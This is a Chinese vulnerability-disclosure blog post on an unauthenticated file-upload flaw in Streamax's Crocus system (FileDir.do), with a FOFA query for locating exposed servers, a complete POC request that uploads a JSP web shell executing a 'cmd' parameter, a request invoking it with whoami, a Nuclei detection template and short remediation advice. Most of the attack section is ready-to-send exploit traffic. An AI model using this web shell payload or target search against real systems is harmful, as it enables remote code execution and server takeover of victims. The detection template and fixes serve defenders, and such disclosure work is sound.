锐明技术Crocus系统 FileDir.do 文件上传漏洞

锐明技术Crocus系统 FileDir.do 文件上传漏洞

03913

锐明技术Crocus系统 FileDir.do 文件上传漏洞

漏洞信息

项目 内容
漏洞名称 锐明技术Crocus系统 FileDir.do 文件上传漏洞
漏洞类型 文件上传导致RCE
组件 锐明技术Crocus系统
严重程度 高危

漏洞概述

锐明技术Crocus系统 FileDir.do 文件上传接口存在安全漏洞,未经身份验证的攻击者可通过构造恶意上传请求,绕过文件类型限制,将任意文件上传至服务器,进而可能实现远程代码执行或服务器控制,影响系统的完整性和安全性。

测绘语法

FOFA

body="/ThirdResource/respond/respond.min.js" && title="Crocus"

漏洞复现

POC

上传请求

POST /FileDir.do?Action=Upload HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Length: 206
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/jpeg

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

访问Shell

GET /Plugin/FileManage/Temp/177486967639047.jsp?cmd=whoami HTTP/1.1
Host: target
Cookie: JSESSIONID=2C6C1EA56F64F4B732C42C8BACB59906

特征

  • 上传路径:/FileDir.do?Action=Upload
  • 访问路径:/Plugin/FileManage/Temp/*.jsp
  • 响应特征:{"state":"success"} 或文件路径返回

特征

  • 上传路径:/FileDir.do?Action=Upload
  • 响应特征:{"state":"success"} 或文件路径返回

Nuclei检测模板

id: crocus-filedir-upload

info:
  name: Crocus FileDir.do File Upload RCE
  author: fortune
  severity: high
  description: 锐明技术Crocus系统 FileDir.do 文件上传漏洞
  reference:
    - https://mp.weixin.qq.com/s/AJxbUDUSzVdwh7cbYdIIrQ
  tags: crocus,fileupload,rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/FileDir.do?Action=Upload"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="file"; filename="test_{{randstr}}.jsp"
      Content-Type: image/jpeg

      <%out.println("{{randstr}}");%>
      ------WebKitFormBoundary{{randstr}}--
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "success"
          - ".jsp"

修复建议

  1. 联系厂商打补丁或升级版本
  2. 增加Web应用防火墙防护
  3. 关闭互联网暴露面或接口设置访问权限
  4. 严格限制上传文件类型,禁用可执行脚本
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
未分类
喜欢就支持一下吧
点赞13 分享
admin的头像-吾要学习
福建科立讯通信指挥调度管理平台 items.php SQL注入漏洞-吾要学习
福建科立讯通信指挥调度管理平台 items.php SQL注入漏洞
福建科立讯通信指挥调度管理平台 items.php SQL注入漏洞
16小时前 54
金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞-吾要学习
金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞
金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞
7天前 54
三汇SMG网关管理软件 9-2radius.php 远程命令执行漏洞-吾要学习
三汇SMG网关管理软件 9-2radius.php 远程命令执行漏洞
三汇SMG网关管理软件 9-2radius.php 远程命令执行漏洞
7天前 54
宏景人力资源管理系统 DigestDownLoad SQL注入漏洞-吾要学习
宏景人力资源管理系统 DigestDownLoad SQL注入漏洞
宏景人力资源管理系统 DigestDownLoad SQL注入漏洞
13小时前 52
亿赛通-电子文档DecryptApplication 任意文件读取漏洞-吾要学习
亿赛通-电子文档DecryptApplication 任意文件读取漏洞
亿赛通-电子文档DecryptApplication 任意文件读取漏洞
13小时前 52
金和OA AjaxForGetBudgetTime.ashx SQL注入漏洞-吾要学习
金和OA AjaxForGetBudgetTime.ashx SQL注入漏洞
金和OA AjaxForGetBudgetTime.ashx SQL注入漏洞
7天前 51
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

用户封面
admin的头像-吾要学习
福建科立讯通信指挥调度管理平台 items.php SQL注入漏洞-吾要学习
福建科立讯通信指挥调度管理平台 items.php SQL注入漏洞
福建科立讯通信指挥调度管理平台 items.php SQL注入漏洞
16小时前 54
金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞-吾要学习
金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞
金和OA AjaxForDepartmentCollect.ashx SQL注入漏洞
7天前 54
三汇SMG网关管理软件 9-2radius.php 远程命令执行漏洞-吾要学习
三汇SMG网关管理软件 9-2radius.php 远程命令执行漏洞
三汇SMG网关管理软件 9-2radius.php 远程命令执行漏洞
7天前 54
宏景人力资源管理系统 DigestDownLoad SQL注入漏洞-吾要学习
宏景人力资源管理系统 DigestDownLoad SQL注入漏洞
宏景人力资源管理系统 DigestDownLoad SQL注入漏洞
13小时前 52
亿赛通-电子文档DecryptApplication 任意文件读取漏洞-吾要学习
亿赛通-电子文档DecryptApplication 任意文件读取漏洞
亿赛通-电子文档DecryptApplication 任意文件读取漏洞
13小时前 52
金和OA AjaxForGetBudgetTime.ashx SQL注入漏洞-吾要学习
金和OA AjaxForGetBudgetTime.ashx SQL注入漏洞
金和OA AjaxForGetBudgetTime.ashx SQL注入漏洞
7天前 51